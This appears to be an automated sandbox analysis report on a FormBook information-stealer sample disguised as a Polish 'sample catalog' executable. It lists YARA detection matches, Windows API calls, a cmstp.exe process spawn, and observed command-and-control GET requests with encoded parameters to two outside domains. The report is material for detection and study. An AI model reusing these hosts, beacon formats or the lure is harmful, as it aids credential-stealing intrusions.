          Source: global traffic HTTP traffic detected: GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.leads-mania.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1 Host: www.tankomixing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: nowy przyk#U0142adowy katalog.exe, 00000000.00000002.362117708.000000000077A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: nowy przyk#U0142adowy katalog.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: String function: 0041A4B0 appears 38 times
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: String function: 009BB150 appears 35 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0464B150 appears 35 times
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004185D0 NtCreateFile,1_2_004185D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00418680 NtReadFile,1_2_00418680
